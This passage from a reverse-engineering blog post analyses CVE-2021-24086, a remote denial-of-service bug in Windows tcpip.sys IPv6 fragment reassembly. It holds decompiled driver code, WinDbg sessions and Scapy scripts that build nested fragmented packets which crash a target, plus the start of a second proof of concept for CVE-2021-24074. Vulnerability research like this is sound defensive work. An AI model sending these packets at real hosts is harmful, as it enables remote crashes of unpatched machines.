At this point, I felt I had accumulated enough new information and it was time to zoom back into the target. We want to verify that reality works like the literature says it does, and by doing so we will improve our overall understanding. After studying this code for a while we start to understand the broad strokes. The function receives a Packet, but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up into three main parts; again, no need for us to understand every single detail, let's just understand it conceptually and what/how it tries to achieve its goals:

  • 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup; a conceptual sketch of this lookup follows the list below):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
        g_37HashSeed,
        Pkt + OffsetSrcIp,
        AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  *(_OWORD *)&Context.ChainHead = 0;
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}
  • 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
    PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}

[image: ida3]
  • 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

  • 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->NextHeader = Fragment->nexthdr;
  UnfragmentableLength = LOWORD(Packet->NetworkLayerHeaderSize) - 48;
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      FirstNetBuffer->DataOffset - Packet->NetworkLayerHeaderSize + 0x28,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
    NextHeaderOffset = Packet->NextHeaderPosition;
  }
  Reassembly->NextHeaderOffset = NextHeaderOffset;
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}
  • 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.
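
Stepping back to point 1 for a second, the lookup logic can be summarized with a tiny conceptual model (plain Python, my own simplification; the real code hashes these fields with RtlCompute37Hash and walks a hash table guarded by a spinlock):

# Conceptual model of Ipv6pFragmentLookup / IppCreateInReassemblySet: fragments
# are grouped by (interface, source address, destination address, identification).
reassemblies = {}

def find_or_create_reassembly(iface, src, dst, identification):
    key = (iface, src, dst, identification)   # the fields IppReassemblyHashKey hashes
    if key not in reassemblies:               # no match -> IppCreateInReassemblySet path
        reassemblies[key] = {'unfragmentable': None, 'fragments': []}
    return reassemblies[key]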

At this stage we have an OK understanding of the data structures involved in keeping track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // Below is the added code by the patch
  if ( TotalLength > 0xFFFF ) {
      // Bail
  }

How cool is that? That's really rewarding: putting in a bunch of work that may not feel that useful at the time, but eventually adds up, snowballs and really moves the needle forward. It's just a slow process and you've got to get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back to this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference; bingo, that is looking good!

After carefully analyzing the crash I started to realize that the potential issue had been hiding in plain sight, right in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}

Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )

Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, the function needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as gaining access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several times, it was still a little bit confusing to me so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
// ...

Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.
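
The whole trick boils down to a few lines of plain Python (my own toy model of the two calls above):

# Toy model: the retreat only backs uint16_t(HeaderAndOptionsLength) bytes,
# while NdisGetDataBuffer is asked for the full 32-bit value, so its
# 'DataLength < BytesNeeded' check fails and it returns NULL.
def retreat_then_get(header_and_options_length):
    data_length = header_and_options_length & 0xffff    # NetioRetreatNetBuffer(uint16_t(...))
    bytes_needed = header_and_options_length            # NdisGetDataBuffer(..., full value, ...)
    return None if data_length < bytes_needed else 'mapped buffer'

assert retreat_then_get(0x1337) == 'mapped buffer'   # small header: behaves as expected
assert retreat_then_get(0x31337) is None             # > 0xffff: NULL, later blindly dereferenced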

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;

This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
id = 0xdeadbeef
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'
second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
    / '---frag2'
sendp([first, second], iface='eth1')

Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800`117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800`117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800`117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff800`11844478)]

kd> 
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800`117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
    NBL                ffffc107f7be1d90    Next NBL           NULL
    First NB           ffffc107f7be1f10    Source             NULL
                                           Pool               ffffc107f58ba980 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump


; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0                   Source pool        ffffc107f58ba980
    First MDL          0                   DataOffset         0
    Current MDL        [NULL]              Current MDL offset 0

    View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800`117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff800`11691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800`117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0n40                Source pool        ffffc107f58ba980
    First MDL          ffffc107f5ee8040    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

// ...

; Getting access to the backing buffer

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800`117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff800`11844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800`117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107`f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......

All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than like ~1200 bytes. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe though there might be another code-path having a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I've noticed that the TotalLength field is also truncated a bit further down in the function and written in the IPv6 header of the packet. This header is eventually copied in the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;

My theory was that there might be some code that would read this Ipv6.length (which is truncated, as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although the length would end up having a smaller value than the actual size of the packet, and it was hard for me to come up with a scenario where this would cause an issue, I still chased this theory as it was the only thing I had.
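
As a quick aside, the __ROR2__(TotalLength, 8) above really is just a byte swap of the lower 16 bits, i.e. htons on a little-endian host; a two-line check in plain Python:

def ror2(x, n = 8):
    x &= 0xffff                                   # the C code operates on a uint16_t
    return ((x >> n) | (x << (16 - n))) & 0xffff

assert ror2(0x2345) == 0x4523                     # a plain byte swap
import socket
assert socket.htons(0x2345) == ror2(0x2345)       # true on a little-endian host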

What I started to do at this point was to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically, I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but got no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe, I really need to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right so I decided to start fresh again. Going back to the big picture, I've studied a bit more the reassembly algorithm, diffed again just in case I missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)

The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff801`0a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
    NB                 ffff800fa2a46f10    Next NB            NULL
    Length                10020            Source pool        ffff800fa06ba240
    First MDL          ffff800fa0eb1180    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
    NBL                ffff800fa2a46d90    Next NBL           NULL
    First NB           ffff800fa2a46f10    Source             NULL
                                           Pool               ffff800fa06ba240 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
  MDL ffff800fa0eb1180
    ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  `·····<@········
    ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
    ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

  ...

  MDL ffff800f9ff5e8b0
    ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
    ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

  ...

  MDL ffff800fa0937280
    ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·

What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ...
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

It is a fragment that is 0x10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL holds the UDP header of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)

Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd> 
tcpip!Ipv6pReassembleDatagram+0xce:
fffff805`4a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff805`4a5cde42 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff805`4a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff805`4a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff805`4a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xed:
fffff805`4a5cde59 41b901000000    mov     r9d,1

kd> 
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff805`4a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd> 
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff805`4a5cde64 4533c0          xor     r8d,r8d

kd> 
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff805`4a5cde67 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff805`4a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff805`4a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff805`4a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists
13 NDIS!ndisCallReceiveHandler
14 NDIS!ndisInvokeNextReceiveHandler
15 NDIS!NdisMIndicateReceiveNetBufferLists
16 netvsc!ReceivePacketMessage
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup

Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Moral of the day: don't leave any stone unturned, follow your intuitions and reach the state of no unknowns.

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver, found by Microsoft's own @piazzt. From zero to remote BSoD. The PoC is available on my GitHub here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way here you should join and come hang out in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low-level subjects. Hopefully we can also generate more interest in external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

Here is the PoC I built based on the high-quality blog post put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    tcpip!Ipv4pReceiveRoutingHeader+0x16a:
    fffff804`453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x16e:
    fffff804`453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e`85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e`85b78220  ffffb90e`85b782c0
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x171:
    fffff804`453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff804`4541f2e0)]
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x178:
    fffff804`453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`453b5164)
    kd> db @rdx
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17d:
    fffff804`453c6f8d 84c0            test    al,al
    kd> r.
    al=00000000`00000000  al=00000000`00000000
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17f:
    fffff804`453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804`453c7473)
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x185:
    fffff804`453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    tcpip!Ipv4pReceiveRoutingHeader+0x188:
    fffff804`453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff804`45354f84)
    kd> dqs @rcx l1
    ffffb90e`85b78220  ffffb90e`85b782c0

    Call-stack (skip first hit):
      kd> kc
      # Call Site
      00 tcpip!Ipv4pReceiveRoutingHeader
      01 tcpip!IppReceiveHeaderBatch
      02 tcpip!Ipv4pReassembleDatagram
      03 tcpip!Ipv4pReceiveFragment
      04 tcpip!Ipv4pReceiveFragmentList
      05 tcpip!IppReceiveHeaderBatch
      06 tcpip!IppFlcReceivePacketsCore
      07 tcpip!IpFlcReceivePackets
      08 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
      09 tcpip!FlReceiveNetBufferListChainCalloutRoutine
      0a nt!KeExpandKernelStackAndCalloutInternal
      0b nt!KeExpandKernelStackAndCalloutEx
      0c tcpip!FlReceiveNetBufferListChain

    Snippet:
      __int16 __fastcall Ipv4pReceiveRoutingHeader(Packet_t *Packet)
      {
        // ...
        // kd> db @rax
        // ffffdc07`ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
        RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
